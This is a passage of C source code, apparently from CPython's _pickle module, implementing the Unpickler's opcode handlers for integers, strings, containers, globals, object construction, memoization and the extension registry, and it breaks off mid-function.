Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Pickler___init____doc__, /*tp_doc*/
(traverseproc)Pickler_traverse, /*tp_traverse*/
(inquiry)Pickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Pickler_methods, /*tp_methods*/
Pickler_members, /*tp_members*/
Pickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Pickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/* Temporary helper for calling self.find_class().
XXX: It would be nice to be able to avoid the Python function call overhead
by using the C version of find_class() directly when find_class() is not
overridden by a subclass. Although, this could become rather hackish. A
simpler optimization would be to call the C function when self is not a
subclass instance. */
static PyObject *
find_class(UnpicklerObject *self, PyObject *module_name, PyObject *global_name)
{
_Py_IDENTIFIER(find_class);
return _PyObject_CallMethodIdObjArgs((PyObject *)self, &PyId_find_class,
module_name, global_name, NULL);
}
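/* Pop the position of the innermost MARK pushed so far and update the
   unpickler stack's mark/fence bookkeeping; sets UnpicklingError and
   returns -1 if no MARK is pending. */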
static Py_ssize_t
marker(UnpicklerObject *self)
{
Py_ssize_t mark;
if (self->num_marks < 1) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "could not find MARK");
return -1;
}
mark = self->marks[--self->num_marks];
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
return mark;
}
static int
load_none(UnpicklerObject *self)
{
PDATA_APPEND(self->stack, Py_None, -1);
return 0;
}
static int
load_int(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
long x;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
/* XXX: Should the base argument of strtol() be explicitly set to 10?
XXX(avassalotti): Should this use PyOS_strtol()? */
x = strtol(s, &endptr, 0);
if (errno || (*endptr != '\n' && *endptr != '\0')) {
/* Hm, maybe we've got something long. Let's try reading
* it as a Python int object. */
errno = 0;
/* XXX: Same thing about the base here. */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL) {
PyErr_SetString(PyExc_ValueError,
"could not convert string to int");
return -1;
}
}
else {
if (len == 3 && (x == 0 || x == 1)) {
if ((value = PyBool_FromLong(x)) == NULL)
return -1;
}
else {
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
}
}
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_bool(UnpicklerObject *self, PyObject *boolean)
{
assert(boolean == Py_True || boolean == Py_False);
PDATA_APPEND(self->stack, boolean, -1);
return 0;
}
/* s contains nbytes bytes of an unsigned little-endian integer. Return its value
 * as a C Py_ssize_t, or -1 if it's higher than PY_SSIZE_T_MAX.
*/
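/* Illustration: with nbytes == 2 and input bytes {0x34, 0x12}, the loop below
   computes 0x34 | (0x12 << 8) == 0x1234.  On a 32-bit build, any non-zero byte
   beyond sizeof(size_t) in a BINBYTES8/BINUNICODE8 length makes this return -1
   instead of silently truncating. */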
static Py_ssize_t
calc_binsize(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
int i;
size_t x = 0;
if (nbytes > (int)sizeof(size_t)) {
/* Check for integer overflow. BINBYTES8 and BINUNICODE8 opcodes
* have 64-bit size that can't be represented on 32-bit platform.
*/
for (i = (int)sizeof(size_t); i < nbytes; i++) {
if (s[i])
return -1;
}
nbytes = (int)sizeof(size_t);
}
for (i = 0; i < nbytes; i++) {
x |= (size_t) s[i] << (8 * i);
}
if (x > PY_SSIZE_T_MAX)
return -1;
else
return (Py_ssize_t) x;
}
/* s contains nbytes bytes of a little-endian integer. Return its value as a
 * C long. Obscure: when nbytes is 1 or 2, this is an unsigned little-endian
 * int, but when nbytes is 4 it's a signed one. This is a historical source
 * of cross-platform bugs.
*/
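/* Illustration: with nbytes == 4 and bytes {0xff, 0xff, 0xff, 0xff}, the loop
   accumulates 0xffffffff; the sign-extension step below then yields -1 on
   platforms where long is wider than 4 bytes. */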
static long
calc_binint(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
Py_ssize_t i;
long x = 0;
for (i = 0; i < nbytes; i++) {
x |= (long)s[i] << (8 * i);
}
/* Unlike BININT1 and BININT2, BININT (more accurately BININT4)
* is signed, so on a box with longs bigger than 4 bytes we need
* to extend a BININT's sign bit to the full width.
*/
if (SIZEOF_LONG > 4 && nbytes == 4) {
x |= -(x & (1L << 31));
}
return x;
}
static int
load_binintx(UnpicklerObject *self, char *s, int size)
{
PyObject *value;
long x;
x = calc_binint(s, size);
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binint(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
return load_binintx(self, s, 4);
}
static int
load_binint1(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
return load_binintx(self, s, 1);
}
static int
load_binint2(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 2) < 0)
return -1;
return load_binintx(self, s, 2);
}
static int
load_long(UnpicklerObject *self)
{
PyObject *value;
char *s = NULL;
Py_ssize_t len;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* s[len-2] will usually be 'L' (and s[len-1] is '\n'); we need to remove
the 'L' before calling PyLong_FromString. In order to maintain
compatibility with Python 3.0.0, we don't actually *require*
the 'L' to be present. */
if (s[len-2] == 'L')
s[len-2] = '\0';
    /* XXX: Should the base argument be explicitly set to 10? */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
/* 'size' bytes contain the # of bytes of little-endian 256's-complement
* data following.
*/
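/* Illustration: LONG1 with a length byte of 2 and payload {0x00, 0x01} decodes
   to 256, while a length of 1 with payload {0xff} decodes to -1, because the
   payload is interpreted as a signed little-endian value. */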
static int
load_counted_long(UnpicklerObject *self, int size)
{
PyObject *value;
char *nbytes;
char *pdata;
assert(size == 1 || size == 4);
if (_Unpickler_Read(self, &nbytes, size) < 0)
return -1;
size = calc_binint(nbytes, size);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
/* Corrupt or hostile pickle -- we never write one like this */
PyErr_SetString(st->UnpicklingError,
"LONG pickle has negative byte count");
return -1;
}
if (size == 0)
value = PyLong_FromLong(0L);
else {
/* Read the raw little-endian bytes and convert. */
if (_Unpickler_Read(self, &pdata, size) < 0)
return -1;
value = _PyLong_FromByteArray((unsigned char *)pdata, (size_t)size,
1 /* little endian */ , 1 /* signed */ );
}
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_float(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
double d;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
d = PyOS_string_to_double(s, &endptr, PyExc_OverflowError);
if (d == -1.0 && PyErr_Occurred())
return -1;
if ((endptr[0] != '\n') && (endptr[0] != '\0')) {
PyErr_SetString(PyExc_ValueError, "could not convert string to float");
return -1;
}
value = PyFloat_FromDouble(d);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binfloat(UnpicklerObject *self)
{
PyObject *value;
double x;
char *s;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
x = _PyFloat_Unpack8((unsigned char *)s, 0);
if (x == -1.0 && PyErr_Occurred())
return -1;
if ((value = PyFloat_FromDouble(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_string(UnpicklerObject *self)
{
PyObject *bytes;
PyObject *obj;
Py_ssize_t len;
char *s, *p;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
/* Strip the newline */
len--;
/* Strip outermost quotes */
if (len >= 2 && s[0] == s[len - 1] && (s[0] == '\'' || s[0] == '"')) {
p = s + 1;
len -= 2;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"the STRING opcode argument must be quoted");
return -1;
}
assert(len >= 0);
/* Use the PyBytes API to decode the string, since that is what is used
to encode, and then coerce the result to Unicode. */
bytes = PyBytes_DecodeEscape(p, len, NULL, 0, NULL);
if (bytes == NULL)
return -1;
/* Leave the Python 2.x strings as bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = bytes;
}
else {
obj = PyUnicode_FromEncodedObject(bytes, self->encoding, self->errors);
Py_DECREF(bytes);
if (obj == NULL) {
return -1;
}
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
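/* The BINSTRING family stores an nbytes-wide little-endian length prefix
   followed by that many payload bytes.  E.g. after a SHORT_BINSTRING opcode,
   the bytes 0x03 'a' 'b' 'c' yield the three-character string "abc", decoded
   with the Unpickler's encoding unless that encoding is 'bytes'. */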
static int
load_counted_binstring(UnpicklerObject *self, int nbytes)
{
PyObject *obj;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"BINSTRING exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
/* Convert Python 2.x strings to bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = PyBytes_FromStringAndSize(s, size);
}
else {
obj = PyUnicode_Decode(s, size, self->encoding, self->errors);
}
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binbytes(UnpicklerObject *self, int nbytes)
{
PyObject *bytes;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINBYTES exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
bytes = PyBytes_FromStringAndSize(s, size);
if (bytes == NULL)
return -1;
PDATA_PUSH(self->stack, bytes, -1);
return 0;
}
static int
load_unicode(UnpicklerObject *self)
{
PyObject *str;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
str = PyUnicode_DecodeRawUnicodeEscape(s, len - 1, NULL);
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_binunicode(UnpicklerObject *self, int nbytes)
{
PyObject *str;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINUNICODE exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
str = PyUnicode_DecodeUTF8(s, size, "surrogatepass");
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_tuple(UnpicklerObject *self, Py_ssize_t len)
{
PyObject *tuple;
if (Py_SIZE(self->stack) < len)
return Pdata_stack_underflow(self->stack);
tuple = Pdata_poptuple(self->stack, Py_SIZE(self->stack) - len);
if (tuple == NULL)
return -1;
PDATA_PUSH(self->stack, tuple, -1);
return 0;
}
static int
load_tuple(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
return load_counted_tuple(self, Py_SIZE(self->stack) - i);
}
static int
load_empty_list(UnpicklerObject *self)
{
PyObject *list;
if ((list = PyList_New(0)) == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_empty_dict(UnpicklerObject *self)
{
PyObject *dict;
if ((dict = PyDict_New()) == NULL)
return -1;
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_empty_set(UnpicklerObject *self)
{
PyObject *set;
if ((set = PySet_New(NULL)) == NULL)
return -1;
PDATA_PUSH(self->stack, set, -1);
return 0;
}
static int
load_list(UnpicklerObject *self)
{
PyObject *list;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
list = Pdata_poplist(self->stack, i);
if (list == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_dict(UnpicklerObject *self)
{
PyObject *dict, *key, *value;
Py_ssize_t i, j, k;
if ((i = marker(self)) < 0)
return -1;
j = Py_SIZE(self->stack);
if ((dict = PyDict_New()) == NULL)
return -1;
if ((j - i) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "odd number of items for DICT");
Py_DECREF(dict);
return -1;
}
for (k = i + 1; k < j; k += 2) {
key = self->stack->data[k - 1];
value = self->stack->data[k];
if (PyDict_SetItem(dict, key, value) < 0) {
Py_DECREF(dict);
return -1;
}
}
Pdata_clear(self->stack, i);
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_frozenset(UnpicklerObject *self)
{
PyObject *items;
PyObject *frozenset;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
items = Pdata_poptuple(self->stack, i);
if (items == NULL)
return -1;
frozenset = PyFrozenSet_New(items);
Py_DECREF(items);
if (frozenset == NULL)
return -1;
PDATA_PUSH(self->stack, frozenset, -1);
return 0;
}
static PyObject *
instantiate(PyObject *cls, PyObject *args)
{
/* Caller must assure args are a tuple. Normally, args come from
Pdata_poptuple which packs objects from the top of the stack
into a newly created tuple. */
assert(PyTuple_Check(args));
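    /* With an empty argument tuple, a type that does not define
       __getinitargs__ is created via cls.__new__(cls), bypassing __init__;
       otherwise fall through to the ordinary call below. */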
if (!PyTuple_GET_SIZE(args) && PyType_Check(cls)) {
_Py_IDENTIFIER(__getinitargs__);
_Py_IDENTIFIER(__new__);
PyObject *func;
if (_PyObject_LookupAttrId(cls, &PyId___getinitargs__, &func) < 0) {
return NULL;
}
if (func == NULL) {
return _PyObject_CallMethodIdObjArgs(cls, &PyId___new__, cls, NULL);
}
Py_DECREF(func);
}
return PyObject_CallObject(cls, args);
}
static int
load_obj(UnpicklerObject *self)
{
PyObject *cls, *args, *obj = NULL;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
if (Py_SIZE(self->stack) - i < 1)
return Pdata_stack_underflow(self->stack);
args = Pdata_poptuple(self->stack, i + 1);
if (args == NULL)
return -1;
PDATA_POP(self->stack, cls);
if (cls) {
obj = instantiate(cls, args);
Py_DECREF(cls);
}
Py_DECREF(args);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_inst(UnpicklerObject *self)
{
PyObject *cls = NULL;
PyObject *args = NULL;
PyObject *obj = NULL;
PyObject *module_name;
PyObject *class_name;
Py_ssize_t len;
Py_ssize_t i;
char *s;
if ((i = marker(self)) < 0)
return -1;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* Here it is safe to use PyUnicode_DecodeASCII(), even though non-ASCII
identifiers are permitted in Python 3.0, since the INST opcode is only
supported by older protocols on Python 2.x. */
module_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (module_name == NULL)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
class_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (class_name != NULL) {
cls = find_class(self, module_name, class_name);
Py_DECREF(class_name);
}
}
Py_DECREF(module_name);
if (cls == NULL)
return -1;
if ((args = Pdata_poptuple(self->stack, i)) != NULL) {
obj = instantiate(cls, args);
Py_DECREF(args);
}
Py_DECREF(cls);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_newobj(UnpicklerObject *self)
{
PyObject *args = NULL;
PyObject *clsraw = NULL;
PyTypeObject *cls; /* clsraw cast to its true type */
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
/* Stack is ... cls argtuple, and we want to call
* cls.__new__(cls, *argtuple).
*/
PDATA_POP(self->stack, args);
if (args == NULL)
goto error;
if (!PyTuple_Check(args)) {
PyErr_SetString(st->UnpicklingError,
"NEWOBJ expected an arg " "tuple.");
goto error;
}
PDATA_POP(self->stack, clsraw);
cls = (PyTypeObject *)clsraw;
if (cls == NULL)
goto error;
if (!PyType_Check(cls)) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"isn't a type object");
goto error;
}
if (cls->tp_new == NULL) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"has NULL tp_new");
goto error;
}
/* Call __new__. */
obj = cls->tp_new(cls, args, NULL);
if (obj == NULL)
goto error;
Py_DECREF(args);
Py_DECREF(clsraw);
PDATA_PUSH(self->stack, obj, -1);
return 0;
error:
Py_XDECREF(args);
Py_XDECREF(clsraw);
return -1;
}
static int
load_newobj_ex(UnpicklerObject *self)
{
PyObject *cls, *args, *kwargs;
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
PDATA_POP(self->stack, kwargs);
if (kwargs == NULL) {
return -1;
}
PDATA_POP(self->stack, args);
if (args == NULL) {
Py_DECREF(kwargs);
return -1;
}
PDATA_POP(self->stack, cls);
if (cls == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
return -1;
}
if (!PyType_Check(cls)) {
Py_DECREF(kwargs);
Py_DECREF(args);
PyErr_Format(st->UnpicklingError,
"NEWOBJ_EX class argument must be a type, not %.200s",
Py_TYPE(cls)->tp_name);
Py_DECREF(cls);
return -1;
}
if (((PyTypeObject *)cls)->tp_new == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
PyErr_SetString(st->UnpicklingError,
"NEWOBJ_EX class argument doesn't have __new__");
return -1;
}
obj = ((PyTypeObject *)cls)->tp_new((PyTypeObject *)cls, args, kwargs);
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_global(UnpicklerObject *self)
{
PyObject *global = NULL;
PyObject *module_name;
PyObject *global_name;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
module_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (!module_name)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
global_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (global_name) {
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
}
}
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_stack_global(UnpicklerObject *self)
{
PyObject *global;
PyObject *module_name;
PyObject *global_name;
PDATA_POP(self->stack, global_name);
PDATA_POP(self->stack, module_name);
if (module_name == NULL || !PyUnicode_CheckExact(module_name) ||
global_name == NULL || !PyUnicode_CheckExact(global_name)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "STACK_GLOBAL requires str");
Py_XDECREF(global_name);
Py_XDECREF(module_name);
return -1;
}
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_persid(UnpicklerObject *self)
{
PyObject *pid, *obj;
Py_ssize_t len;
char *s;
if (self->pers_func) {
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
pid = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (pid == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeDecodeError)) {
PyErr_SetString(_Pickle_GetGlobalState()->UnpicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
}
return -1;
}
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_binpersid(UnpicklerObject *self)
{
PyObject *pid, *obj;
if (self->pers_func) {
PDATA_POP(self->stack, pid);
if (pid == NULL)
return -1;
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_pop(UnpicklerObject *self)
{
Py_ssize_t len = Py_SIZE(self->stack);
/* Note that we split the (pickle.py) stack into two stacks,
* an object stack and a mark stack. We have to be clever and
* pop the right one. We do this by looking at the top of the
* mark stack first, and only signalling a stack underflow if
* the object stack is empty and the mark stack doesn't match
* our expectations.
*/
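    /* Example: a POP issued immediately after a MARK finds the newest mark
       equal to the current stack height, so the mark itself is discarded and
       no object is removed. */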
if (self->num_marks > 0 && self->marks[self->num_marks - 1] == len) {
self->num_marks--;
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
} else if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
else {
len--;
Py_DECREF(self->stack->data[len]);
Py_SIZE(self->stack) = len;
}
return 0;
}
static int
load_pop_mark(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
Pdata_clear(self->stack, i);
return 0;
}
static int
load_dup(UnpicklerObject *self)
{
PyObject *last;
Py_ssize_t len = Py_SIZE(self->stack);
if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
last = self->stack->data[len - 1];
PDATA_APPEND(self->stack, last, -1);
return 0;
}
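/* GET reads a decimal memo index terminated by a newline, while BINGET and
   LONG_BINGET (below) read 1-byte and 4-byte little-endian indices
   respectively; all three push the memoized object back onto the stack. */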
static int
load_get(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred()) {
Py_DECREF(key);
return -1;
}
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
if (!PyErr_Occurred())
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
return -1;
}
Py_DECREF(key);
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
idx = Py_CHARMASK(s[0]);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_long_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
idx = calc_binsize(s, 4);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
/* Push an object from the extension registry (EXT[124]). nbytes is
* the number of bytes following the opcode, holding the index (code) value.
*/
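/* Example: an EXT1 opcode followed by the byte 0x07 pushes the object
   registered under extension code 7; the (module, name) pair is resolved via
   find_class() on first use and the result is cached in extension_cache. */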
static int
load_extension(UnpicklerObject *self, int nbytes)
{
char *codebytes; /* the nbytes bytes after the opcode */
long code; /* calc_binint returns long */
PyObject *py_code; /* code as a Python int */
PyObject *obj; /* the object to push */
PyObject *pair; /* (module_name, class_name) */
PyObject *module_name, *class_name;
PickleState *st = _Pickle_GetGlobalState();
assert(nbytes == 1 || nbytes == 2 || nbytes == 4);
if (_Unpickler_Read(self, &codebytes, nbytes) < 0)
return -1;
code = calc_binint(codebytes, nbytes);
if (code <= 0) { /* note that 0 is forbidden */
/* Corrupt or hostile pickle. */
PyErr_SetString(st->UnpicklingError, "EXT specifies code <= 0");
return -1;
}
/* Look for the code in the cache. */
py_code = PyLong_FromLong(code);
if (py_code == NULL)
return -1;
obj = PyDict_GetItemWithError(st->extension_cache, py_code);
if (obj != NULL) {
/* Bingo. */
Py_DECREF(py_code);
PDATA_APPEND(self->stack, obj, -1);
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(py_code);
return -1;
}
/* Look up the (module_name, class_name) pair. */
pair = PyDict_GetItemWithError(st->inverted_registry, py_code);
if (pair == NULL) {
Py_DECREF(py_code);
if (!PyErr_Occurred()) {
PyErr_Format(PyExc_ValueError, "unregistered extension "
"code %ld", code);
}
return -1;
}
/* Since the extension registry is manipulable via Python code,
* confirm that pair is really a 2-tuple of strings.
*/
if (!PyTuple_Check(pair) || PyTuple_Size(pair) != 2 ||
!PyUnicode_Check(module_name = PyTuple_GET_ITEM(pair, 0)) ||
!PyUnicode_Check(class_name = PyTuple_GET_ITEM(pair, 1))) {
Py_DECREF(py_code);
PyErr_Format(PyExc_ValueError, "_inverted_registry[%ld] "
"isn't a 2-tuple of strings", code);
return -1;
}
/* Load the object. */
obj = find_class(self, module_name, class_name);
if (obj == NULL) {
Py_DECREF(py_code);
return -1;
}
/* Cache code -> obj. */
code = PyDict_SetItem(st->extension_cache, py_code, obj);
Py_DECREF(py_code);
if (code < 0) {
Py_DECREF(obj);
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_put(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
Py_DECREF(key);
if (idx < 0) {
if (!PyErr_Occurred())
PyErr_SetString(PyExc_ValueError,
"negative PUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = Py_CHARMASK(s[0]);
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_long_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = calc_binsize(s, 4);
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"negative LONG_BINPUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_memoize(UnpicklerObject *self)
{
PyObject *value;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
return _Unpickler_MemoPut(self, self->memo_len, value);
}
static int
do_append(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value;
PyObject *slice;
PyObject *list;
PyObject *result;
Py_ssize_t len, i;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
list = self->stack->data[x - 1];
if (PyList_CheckExact(list)) {
Py_ssize_t list_len;
int ret;
slice = Pdata_poplist(self->stack, x);
if (!slice)
return -1;
list_len = PyList_GET_SIZE(list);
ret = PyList_SetSlice(list, list_len, list_len, slice);
Py_DECREF(slice);
return ret;
}
else {
PyObject *extend_func;
_Py_IDENTIFIER(extend);
extend_func = _PyObject_GetAttrId(list, &PyId_extend);
if (extend_func != NULL) {
slice = Pdata_poplist(self->stack, x);
if (!slice) {
Py_DECREF(extend_func);
return -1;
}
result = _Pickle_FastCall(extend_func, slice);
Py_DECREF(extend_func);
if (result == NULL)
return -1;
Py_DECREF(result);
}
else {
PyObject *append_func;
_Py_IDENTIFIER(append);
            /* Even though PEP 307 requires extend() and append() methods,
               fall back on append() if the object has no extend() method,
               for backward compatibility. */
PyErr_Clear();
append_func = _PyObject_GetAttrId(list, &PyId_append);
if (append_func == NULL)
return -1;
for (i = x; i < len; i++) {
value = self->stack->data[i];
result = _Pickle_FastCall(append_func, value);
if (result == NULL) {
